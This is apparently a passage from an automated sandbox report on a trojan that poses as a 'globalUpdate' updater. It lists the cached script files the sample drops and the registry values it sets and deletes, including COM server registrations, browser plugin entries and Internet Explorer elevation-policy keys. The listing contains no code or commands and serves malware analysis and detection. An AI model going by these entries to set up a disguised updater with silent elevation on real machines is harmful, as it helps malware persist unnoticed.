%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\app_code[1].js (736 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\230[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\set_campaign_id_m[1].js (508 bytes)
Registry activity
The process GoogleUpdate.exe:2460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "59 44 FC 46 17 38 E3 97 36 D2 61 4A A3 FA D2 C6"
[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{B13CB685-2858-4509-BB2E-34E3545B73F9}]
"pv" = "1.3.25.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\F]
"BaseClass" = "Drive"
[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\C]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\D]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\A]
"BaseClass" = "Drive"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
[HKLM\SOFTWARE\GlobalUpdate\Update]
"uid"
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"c"
The process GoogleUpdate.exe:756 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Description" = "globalUpdate Update"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCR\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}\ProgID]
"(Default)" = "globalUpdate.OneClickCtrl.10"
[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"pv" = "1.3.25.0"
[HKCR\globalUpdate.Update3WebControl.4\CLSID]
"(Default)" = "{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"ProductName" = "globalUpdate Update"
[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"(Default)" = "globalUpdate Update Plugin"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{430FD4D0-B729-4F61-AA34-91526481799D}]
"Name" = "globalUpdate Update"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Version" = "4"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"Policy" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Version" = "10"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\globalUpdate\Update]
"GoogleUpdate.exe" = "globalUpdate Update"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"ProductName" = "globalUpdate Update"
[HKCR\globalUpdate.Update3WebControl.4]
"(Default)" = "globalUpdate Update Plugin"
[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\InprocServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"AppName" = "GoogleUpdate.exe"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"vendor" = "globalUpdate"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=4]
"Path" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"Policy" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCR\MIME\Database\Content Type\application/x-vnd.google.update3webcontrol.4]
"CLSID" = "{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"AppName" = "GoogleUpdateBroker.exe"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Description" = "globalUpdate Update"
[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"InstallTime" = "1413862435"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe]
"DisableExceptionChainValidation" = "0"
[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"brand" = "GGLS"
[HKCR\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"(Default)" = "globalUpdate Update Plugin"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{430FD4D0-B729-4F61-AA34-91526481799D}]
"pv" = "1.3.25.0"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"vendor" = "globalUpdate"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "56 92 F4 66 72 14 7F E1 AA B2 C8 FC 8E 30 19 46"
[HKCR\globalUpdate.OneClickCtrl.10\CLSID]
"(Default)" = "{5645E0E7-FC12-43BF-A6E4-F9751942B298}"
[HKLM\SOFTWARE\GlobalUpdate\Update]
"Path" = "%Program Files%\globalUpdate\Update\GoogleUpdate.exe"
"Version" = "1.3.25.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\MozillaPlugins\@staging.google.com/globalUpdate Update;version=10]
"Path" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}]
"AppPath" = "%Program Files%\globalUpdate\Update\1.3.25.0"
[HKCR\MIME\Database\Content Type\application/x-vnd.google.oneclickctrl.10]
"CLSID" = "{5645E0E7-FC12-43BF-A6E4-F9751942B298}"
[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5645E0E7-FC12-43BF-A6E4-F9751942B298}]
"AppPath" = "%Program Files%\globalUpdate\Update"
[HKCR\CLSID\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}\ProgID]
"(Default)" = "globalUpdate.Update3WebControl.4"
[HKCR\CLSID\{5645E0E7-FC12-43BF-A6E4-F9751942B298}\InprocServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\npGoogleUpdate4.dll"
"ThreadingModel" = "Apartment"
[HKCR\globalUpdate.OneClickCtrl.10]
"(Default)" = "globalUpdate Update Plugin"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update]
"mi"
"eulaaccepted"
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"c"
[HKLM\SOFTWARE\GlobalUpdate\Update]
"LastChecked"
[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"UpdateAvailableSince"
[HKLM\SOFTWARE\GlobalUpdate\Update]
"ui"
"uid"
[HKLM\SOFTWARE\GlobalUpdate\Update\ClientState\{430FD4D0-B729-4F61-AA34-91526481799D}]
"UpdateAvailableCount"
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
The process GoogleUpdate.exe:2652 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BB 5F DE 54 9B E3 20 26 3E 7B 60 E6 D1 93 0B C1"
[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"
The process GoogleUpdate.exe:2296 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}]
"(Default)" = "CoCreateAsync"
[HKCR\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachine.1.0"
[HKCR\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}]
"(Default)" = "IApp"
[HKCR\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\Elevation]
"Enabled" = "1"
[HKCR\Interface\{A6D54287-7939-466A-8579-92546D946C8C}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}]
"(Default)" = "IJobObserver"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"
[HKCR\globalUpdateUpdate.CoCreateAsync.1.0]
"(Default)" = "CoCreateAsync"
[HKCR\globalUpdateUpdate.Update3WebMachineFallback\CurVer]
"(Default)" = "globalUpdateUpdate.Update3WebMachineFallback.1.0"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\Elevation]
"Enabled" = "1"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}]
"(Default)" = "Google Update Broker Class Factory"
[HKCR\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}]
"(Default)" = "IGoogleUpdate3Web"
[HKCR\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}]
"(Default)" = "ICredentialDialog"
[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"
[HKCR\globalUpdateUpdate.Update3WebMachine\CLSID]
"(Default)" = "{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\Elevation]
"Enabled" = "1"
[HKCR\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}\NumMethods]
"(Default)" = "13"
[HKCR\globalUpdateUpdate.CredentialDialogMachine\CLSID]
"(Default)" = "{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}"
[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\ProgID]
"(Default)" = "globalUpdate.OneClickProcessLauncherMachine.1.0"
[HKCR\globalUpdateUpdate.Update3WebMachine.1.0\CLSID]
"(Default)" = "{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}"
[HKCR\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}\NumMethods]
"(Default)" = "40"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}]
"(Default)" = "Google Update Broker Class Factory"
[HKCR\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\globalUpdateUpdate.Update3WebMachine.1.0]
"(Default)" = "Google Update Broker Class Factory"
[HKCR\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}]
"(Default)" = "ICoCreateAsyncStatus"
[HKCR\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}\NumMethods]
"(Default)" = "4"
[HKCR\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}]
"(Default)" = "IProcessLauncher"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"
[HKCR\globalUpdateUpdate.CoreMachineClass]
"(Default)" = "Google Update Core Class"
[HKCR\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}\NumMethods]
"(Default)" = "24"
[HKCR\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"
[HKCR\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}\NumMethods]
"(Default)" = "4"
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
"ThreadingModel" = "Both"
[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"
[HKCR\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}\NumMethods]
"(Default)" = "9"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\ProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachine.1.0"
[HKCR\globalUpdateUpdate.ProcessLauncher\CLSID]
"(Default)" = "{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"Policy" = "3"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine.1.0]
"(Default)" = "Google Update Broker Class Factory"
[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
"ThreadingModel" = "Both"
[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}]
"(Default)" = "GoogleUpdate CredentialDialog"
[HKCR\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}\NumMethods]
"(Default)" = "4"
[HKCR\globalUpdateUpdate.ProcessLauncher]
"(Default)" = "Google Update Process Launcher Class"
[HKCR\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}\NumMethods]
"(Default)" = "10"
[HKCR\globalUpdate.OneClickProcessLauncherMachine.1.0\CLSID]
"(Default)" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"
[HKCR\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"
[HKCR\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}]
"(Default)" = "IRegistrationUpdateHook"
[HKCR\globalUpdateUpdate.CoreMachineClass\CLSID]
"(Default)" = "{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}"
[HKCR\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}\NumMethods]
"(Default)" = "10"
[HKCR\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}]
"(Default)" = "IGoogleUpdate3WebSecurity"
[HKCR\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}]
"(Default)" = "IGoogleUpdateCore"
[HKCR\globalUpdateUpdate.ProcessLauncher.1.0]
"(Default)" = "Google Update Process Launcher Class"
[HKCR\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}\NumMethods]
"(Default)" = "4"
[HKCR\globalUpdateUpdate.CoCreateAsync\CurVer]
"(Default)" = "globalUpdateUpdate.CoCreateAsync.1.0"
[HKCR\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}\NumMethods]
"(Default)" = "10"
[HKCR\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}]
"(Default)" = "IAppVersionWeb"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"
[HKCR\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\globalUpdate.OneClickProcessLauncherMachine]
"(Default)" = "globalUpdate.OneClickProcessLauncher"
[HKCR\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}\NumMethods]
"(Default)" = "24"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine]
"(Default)" = "Google Update Broker Class Factory"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 48 80 90 16 B1 9E B5 7A 8B FF 4E 4F 2C 34 3E"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachine"
[HKCR\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}]
"(Default)" = "IGoogleUpdate3"
[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}\ProgID]
"(Default)" = "globalUpdateUpdate.CredentialDialogMachine.1.0"
[HKCR\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}\InProcServer32]
"ThreadingModel" = "Both"
[HKCR\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachineFallback.1.0"
[HKCR\globalUpdateUpdate.CredentialDialogMachine\CurVer]
"(Default)" = "globalUpdateUpdate.CredentialDialogMachine.1.0"
[HKCR\globalUpdateUpdate.Update3WebMachineFallback.1.0\CLSID]
"(Default)" = "{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}"
[HKCR\globalUpdate.OneClickProcessLauncherMachine\CurVer]
"(Default)" = "globalUpdate.OneClickProcessLauncherMachine.1.0"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback\CLSID]
"(Default)" = "{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}"
[HKCR\CLSID\{ADBC39BE-3D20-4333-8D99-E91EB1B62474}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachine"
[HKCR\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine\CurVer]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachine.1.0"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\Elevation]
"Enabled" = "1"
[HKCR\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}\NumMethods]
"(Default)" = "8"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CoreMachineClass"
[HKCR\globalUpdateUpdate.CoreMachineClass\CurVer]
"(Default)" = "globalUpdateUpdate.CoreMachineClass.1"
[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CredentialDialogMachine"
[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}\ProgID]
"(Default)" = "globalUpdateUpdate.CoCreateAsync.1.0"
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll"
[HKCR\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}\NumMethods]
"(Default)" = "8"
[HKCR\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}\InProcServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll"
[HKCR\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}]
"(Default)" = "ICurrentState"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\ProgID]
"(Default)" = "globalUpdateUpdate.CoreMachineClass.1"
[HKCR\globalUpdateUpdate.ProcessLauncher.1.0\CLSID]
"(Default)" = "{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}"
[HKCR\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3WebMachineFallback"
[HKCR\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}\NumMethods]
"(Default)" = "14"
[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CoCreateAsync"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\ProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0"
[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine\CLSID]
"(Default)" = "{ADBC39BE-3D20-4333-8D99-E91EB1B62474}"
[HKCR\globalUpdateUpdate.Update3WebMachineFallback]
"(Default)" = "GoogleUpdate Update3Web"
[HKCR\globalUpdateUpdate.Update3WebMachine]
"(Default)" = "Google Update Broker Class Factory"
[HKCR\globalUpdateUpdate.Update3WebMachineFallback.1.0]
"(Default)" = "GoogleUpdate Update3Web"
[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"(Default)" = "globalUpdate.OneClickProcessLauncher"
[HKCR\globalUpdate.OneClickProcessLauncherMachine\CLSID]
"(Default)" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachineFallback"
[HKCR\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{A6D54287-7939-466A-8579-92546D946C8C}]
"(Default)" = "IOneClickProcessLauncher"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback\CurVer]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"
[HKCR\globalUpdateUpdate.CredentialDialogMachine]
"(Default)" = "GoogleUpdate CredentialDialog"
[HKCR\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\globalUpdateUpdate.CoreMachineClass.1\CLSID]
"(Default)" = "{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\Elevation]
"Enabled" = "1"
[HKCR\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"CLSID" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}]
"(Default)" = "Google Update Core Class"
[HKCR\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}]
"(Default)" = "ICoCreateAsync"
[HKCR\globalUpdate.OneClickProcessLauncherMachine.1.0]
"(Default)" = "globalUpdate.OneClickProcessLauncher"
[HKCR\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}]
"(Default)" = "PSFactoryBuffer"
[HKCR\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}]
"(Default)" = "IPackage"
[HKCR\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}\NumMethods]
"(Default)" = "5"
[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.ProcessLauncher"
[HKCR\globalUpdateUpdate.ProcessLauncher\CurVer]
"(Default)" = "globalUpdateUpdate.ProcessLauncher.1.0"
[HKCR\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}]
"(Default)" = "IAppWeb"
[HKCR\globalUpdateUpdate.CoCreateAsync]
"(Default)" = "CoCreateAsync"
[HKCR\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}\NumMethods]
"(Default)" = "10"
